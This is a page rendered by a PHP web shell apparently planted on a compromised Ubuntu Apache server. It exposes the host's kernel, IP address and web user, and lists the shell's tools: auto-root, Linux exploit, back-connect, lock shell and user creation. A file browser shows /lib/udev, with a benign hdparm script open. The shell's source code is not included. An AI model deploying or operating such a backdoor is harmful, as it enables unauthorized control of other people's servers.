Linux quad-clini-stageVM 5.4.0-1109-azure #115~18.04.1-Ubuntu SMP Mon May 22 20:06:37 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 10.2.0.4 | : 3.137.219.221
Cant Read [ /etc/named.conf ]
7.4.25
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib /
udev /
[ HOME SHELL ]
Name
Size
Permission
Action
hwdb.d
[ DIR ]
drwxr-xr-x
rules.d
[ DIR ]
drwxr-xr-x
ata_id
42.16
KB
-rwxr-xr-x
bcache-export-cached
1.13
KB
-rwxr-xr-x
bcache-register
5.99
KB
-rwxr-xr-x
cdrom_id
54.16
KB
-rwxr-xr-x
collect
42.17
KB
-rwxr-xr-x
hdparm
583
B
-rwxr-xr-x
hwclock-set
776
B
-rwxr-xr-x
hwdb.bin
8.55
MB
-r--r--r--
mtd_probe
5.98
KB
-rwxr-xr-x
probe-bcache
9.99
KB
-rwxr-xr-x
scsi_id
54.71
KB
-rwxr-xr-x
snappy-app-dev
38.07
KB
-rwxr-xr-x
v4l_id
14.08
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : hdparm
#!/bin/sh set -e [ -n "$DEVNAME" ] || exit 1 . /lib/hdparm/hdparm-functions if [ -e /proc/cmdline ]; then #linux only - future proofing against BSD and Hurd :) if grep -wq nohdparm /proc/cmdline ; then exit 0 fi fi raidstat=OK if [ -e /proc/mdstat ]; then if egrep -iq "resync|repair|recover|check" /proc/mdstat; then raidstat=RESYNC fi elif [ -e /proc/rd/status ]; then raidstat=`cat /proc/rd/status` fi if ! [ "$raidstat" = 'OK' ]; then exit 1 fi OPTIONS=$(hdparm_options $DEVNAME) if [ -n "$OPTIONS" ]; then /sbin/hdparm $OPTIONS $DEVNAME 2>/dev/null fi exit 0
Close